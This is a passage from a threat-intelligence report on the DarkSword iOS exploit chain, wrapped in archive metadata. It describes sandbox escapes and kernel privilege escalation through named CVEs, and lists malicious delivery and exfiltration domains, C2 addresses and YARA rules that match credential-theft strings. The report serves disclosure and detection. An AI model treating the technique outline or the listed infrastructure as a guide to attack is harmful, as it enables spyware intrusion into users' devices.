tightly\r\nsandboxed to limit the blast radius of any vulnerabilities it may contain, since it is the most accessible to untrusted\r\nuser content. To bypass this, DarkSword fetches an exploit called sbox0_main_18.4.js or sbx0_main.js to\r\nbreak out of the WebContent sandbox. This exploit leverages CVE-2025-14174, a vulnerability in ANGLE where\r\nparameters were not sufficiently validated in a specific WebGL operation, leading to out-of-bounds memory\r\noperations in Safari's GPU process which the DarkSword developers use to execute arbitrary code within the GPU\r\nprocess.\r\nThis vulnerability was reported to Google (the developers of ANGLE) by Apple and GTIG, and was patched in\r\nSafari with the release of iOS 18.7.3 and 26.2.\r\nGPU Sandbox Escape\r\nIn Safari, the GPU process has more privileges than the WebContent sandbox, but still is restricted from accessing\r\nmuch of the rest of the system. To bypass this limitation, DarkSword uses another sandbox escape exploit,\r\nsbx1_main.js , which leverages CVE-2025-43510, a memory management vulnerability in XNU. This is a copy-on-write bug which is exploited to build arbitrary function call primitives in mediaplaybackd , a system service\r\nwith a larger set of permissions than the Safari GPU process where they can run the final exploit needed. They do\r\nthis by loading a copy of the JavaScriptCore runtime into the mediaplaybackd process, and executing the next\r\nstage exploit within it.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 18 of 23\n\nThis vulnerability was patched by Apple in iOS 18.7.2 and 26.1.\r\nLocal Privilege Escalation and Final Payload\r\nFinally, the exploit loaded one last module, pe_main.js . This uses CVE-2025-43520, a kernel-mode race\r\ncondition in XNU's virtual filesystem (VFS) implementation, which can be exploited to build physical and virtual\r\nmemory read/write primitives. This vulnerability was patched by Apple in iOS 18.7.2 and 26.1.\r\nThe exploit contains a suite of library classes building on top of their primitives that are used by the different post-exploitation payloads, such as Native , which provides abstractions for manipulating raw memory and calling\r\nnative functions, and FileUtils , which provides a POSIX-like filesystem API. Artifacts left behind from the\r\nWebpack process applied to the analyzed GHOSTBLADE sample included file paths that show the structure on\r\ndisk of these libraries (Figure 22).\r\nWe assess that GHOSTBLADE was likely developed by the DarkSword developers, based on the consistency in\r\ncoding styles and the tight integration between it and the library code, which is notably distinct from how\r\nGHOSTKNIFE and GHOSTSABER leveraged these libraries. We also observed additional modifications made to\r\nsome of the post-exploitation payload libraries in the samples observed from PARS Defense, including additional\r\nraw memory buffer manipulation, likely used in follow-on binary modules. Additionally, the libraries in\r\nGHOSTBLADE contained a reference to a function called startSandworm() which was not implemented within\r\nit; we suspect this may be a codename for a different exploit.\r\nsrc/InjectJS.js\r\nsrc/libs/Chain/Chain.js\r\nsrc/libs/Chain/Native.js\r\nsrc/libs/Chain/OffsetsStruct.js\r\nsrc/libs/Driver/Driver.js\r\nsrc/libs/Driver/DriverNewThread.js\r\nsrc/libs/Driver/Offsets.js\r\nsrc/libs/Driver/OffsetsTable.js\r\nsrc/libs/JSUtils/FileUtils.js\r\nsrc/libs/JSUtils/Logger.js\r\nsrc/libs/JSUtils/Utils.js\r\nsrc/libs/TaskRop/Exception.js\r\nsrc/libs/TaskRop/ExceptionMessageStruct.js\r\nsrc/libs/TaskRop/ExceptionReplyStruct.js\r\nsrc/libs/TaskRop/MachMsgHeaderStruct.js\r\nsrc/libs/TaskRop/PAC.js\r\nsrc/libs/TaskRop/PortRightInserter.js\r\nsrc/libs/TaskRop/RegistersStruct.js\r\nsrc/libs/TaskRop/RemoteCall.js\r\nsrc/libs/TaskRop/Sandbox.js\r\nsrc/libs/TaskRop/SelfTaskStruct.js\r\nsrc/libs/TaskRop/Task.js\r\nsrc/libs/TaskRop/TaskRop.js\r\nsrc/libs/TaskRop/Thread.js\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 19 of 23\n\nsrc/libs/TaskRop/ThreadState.js\r\nsrc/libs/TaskRop/VM.js\r\nsrc/libs/TaskRop/VmMapEntry.js\r\nsrc/libs/TaskRop/VMObject.js\r\nsrc/libs/TaskRop/VmPackingParams.js\r\nsrc/libs/TaskRop/VMShmem.js\r\nsrc/loader.js\r\nsrc/main.js\r\nsrc/MigFilterBypassThread.js\r\nFigure 22: Filepath artifacts from GHOSTBLADE sample\r\nOutlook and Implications\r\nThe use of both DarkSword and Coruna by a variety of actors demonstrates the ongoing risk of exploit\r\nproliferation across actors of varying geography and motivation. Google remains committed to aiding in the\r\nmitigation of this problem, in part through our ongoing participation in the Pall Mall Process, designed to build\r\nconsensus and progress toward limiting the harms from the spyware industry. Together, we are focused on\r\ndeveloping international norms and frameworks to limit the misuse of these powerful technologies and protect\r\nhuman rights around the world. These efforts are built on earlier governmental actions, including steps taken by\r\nthe US Government to limit government use of spyware, and a first-of-its-kind international commitment to\r\nsimilar efforts.\r\nAcknowledgments\r\nWe would like to acknowledge and thank Lookout, iVerify, Google Project-Zero, and Apple Security Engineering\r\n\u0026 Architecture team for their partnership throughout this investigation.\r\nIndicators of Compromise (IOCs)\r\nTo assist the wider community in hunting and identifying activity outlined in this blog post, we have included\r\nindicators of compromise (IOCs) in a GTI Collection for registered users. We've also uploaded a sample of\r\nGHOSTBLADE to VirusTotal.\r\nNetwork Indicators\r\nIOC Threat Actor Context\r\nsnapshare[.]chat UNC6748 DarkSword delivery used in Saudi Arabia\r\n62.72.21[.]10 UNC6748 GHOSTKNIFE C2 server (November 2025)\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 20 of 23\n\n72.60.98[.]48 UNC6748 GHOSTKNIFE C2 server (November 2025)\r\nsahibndn[.]io PARS Defense DarkSword delivery used in Turkey\r\ne5.malaymoil[.]com PARS Defense DarkSword delivery used in Malaysia\r\nstatic.cdncounter[.]net UNC6353 DarkSword delivery via watering holes in Ukraine\r\nsqwas.shapelie[.]com UNC6353 GHOSTBLADE exfiltration server\r\nFile Indicators\r\nIOC\r\nThreat\r\nActor\r\nContext\r\n2e5a56beb63f21d9347310412ae6efb29fd3db2d3a3fc0798865a29a3c578d35 UNC6353\r\nExtracted\r\nGHOSTBLADE\r\nsample\r\nDetections\r\nYARA Rules\r\nrule G_Backdoor_GHOSTKNIFE_1 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\nstrings:\r\n$ = \"server_pub_ex\"\r\n$ = \"client_pri_ds\"\r\n$ = \"getfilebyExtention\"\r\n$ = \"getContOfFilesForModule\"\r\n$ = \"carPlayConnectionState\"\r\n$ = \"saveRecordingApp\"\r\n$ = \"getLastItemBack\"\r\n$ = \"the inherted class\"\r\n$ = \"passExtetion\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 21 of 23\n\ncondition:\r\nfilesize \u003c 10MB and not (uint16be(0) == 0x504b or uint32be(0) == 0x6465780a or uint16be(0) ==\r\n}\r\nrule G_Backdoor_GHOSTSABER_1 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\nstrings:\r\n$ = \"sendDeviceInfoJson\"\r\n$ = \"merge2AppLists\"\r\n$ = \"send_command_to_upper_process\"\r\n$ = \"ChangeStatusCheckSleepInterval\"\r\n$ = \"SendRegEx\"\r\n$ = \"evalJsResponse.json\"\r\n$ = \"sendSimpleUploadJsonObject\"\r\n$ = \"device_info_all\"\r\n$ = \"getPayloadForSimpleStatusRequest\"\r\ncondition:\r\nfilesize \u003c 10MB and not (uint16be(0) == 0x504b or uint32be(0) == 0x6465780a or uint16be(0) ==\r\n}\r\nrule G_Datamine_GHOSTBLADE_1 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\nstrings:\r\n$ = \"/private/var/tmp/wifi_passwords.txt\"\r\n$ = \"/private/var/tmp/wifi_passwords_securityd.txt\"\r\n$ = \"/.com.apple.mobile_container_manager.metadata.plist\" fullword\r\n$ = \"X-Device-UUID: ${\"\r\n$ = \"/installed_apps.txt\" fullword\r\n$ = \"icloud_dump_\" fullword\r\ncondition:\r\nfilesize \u003c 10MB and not (uint16be(0) == 0x504b or uint32be(0) == 0x6465780a or uint16be(0) ==\r\n}\r\nrule G_Hunting_DarkSwordExploitChain_ImplantLib_FilePaths_1 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\nstrings:\r\n$ = \"src/InjectJS.js\"\r\n$ = \"src/libs/Chain/Chain.js\"\r\n$ = \"src/libs/Chain/Native.js\"\r\n$ = \"src/libs/Chain/OffsetsStruct.js\"\r\n$ = \"src/libs/Driver/Driver.js\"\r\n$ = \"src/libs/Driver/DriverNewThread.js\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 22 of 23\n\n$ = \"src/libs/Driver/Offsets.js\"\r\n$ = \"src/libs/Driver/OffsetsTable.js\"\r\n$ = \"src/libs/JSUtils/FileUtils.js\"\r\n$ = \"src/libs/JSUtils/Logger.js\"\r\n$ = \"src/libs/JSUtils/Utils.js\"\r\n$ = \"src/libs/TaskRop/Exception.js\"\r\n$ = \"src/libs/TaskRop/ExceptionMessageStruct.js\"\r\n$ = \"src/libs/TaskRop/ExceptionReplyStruct.js\"\r\n$ = \"src/libs/TaskRop/MachMsgHeaderStruct.js\"\r\n$ = \"src/libs/TaskRop/PAC.js\"\r\n$ = \"src/libs/TaskRop/PortRightInserter.js\"\r\n$ = \"src/libs/TaskRop/RegistersStruct.js\"\r\n$ = \"src/libs/TaskRop/RemoteCall.js\"\r\n$ = \"src/libs/TaskRop/Sandbox.js\"\r\n$ = \"src/libs/TaskRop/SelfTaskStruct.js\"\r\n$ = \"src/libs/TaskRop/Task.js\"\r\n$ = \"src/libs/TaskRop/TaskRop.js\"\r\n$ = \"src/libs/TaskRop/Thread.js\"\r\n$ = \"src/libs/TaskRop/ThreadState.js\"\r\n$ = \"src/libs/TaskRop/VM.js\"\r\n$ = \"src/libs/TaskRop/VmMapEntry.js\"\r\n$ = \"src/libs/TaskRop/VMObject.js\"\r\n$ = \"src/libs/TaskRop/VmPackingParams.js\"\r\n$ = \"src/libs/TaskRop/VMShmem.js\"\r\n$ = \"src/MigFilterBypassThread.js\"\r\ncondition:\r\nany of them\r\n}\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain\r\nPage 23 of 23",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain"
	],
	"report_names": [
		"darksword-ios-exploit-chain"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f5aec0b5-627c-445c-b41c-32ee81358344",
			"created_at": "2026-03-06T02:00:03.105841Z",
			"updated_at": "2026-04-10T02:00:03.977432Z",
			"deleted_at": null,
			"main_name": "UNC6353",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC6353",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434607,
	"ts_updated_at": 1775791873,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/62eabf70d765e7fc055409aa7008f48ee4ec3cfb.pdf",
		"text": "https://archive.orkl.eu/62eabf70d765e7fc055409aa7008f48ee4ec3cfb.txt",
		"img": "https://archive.orkl.eu/62eabf70d765e7fc055409aa7008f48ee4ec3cfb.jpg"
	}
}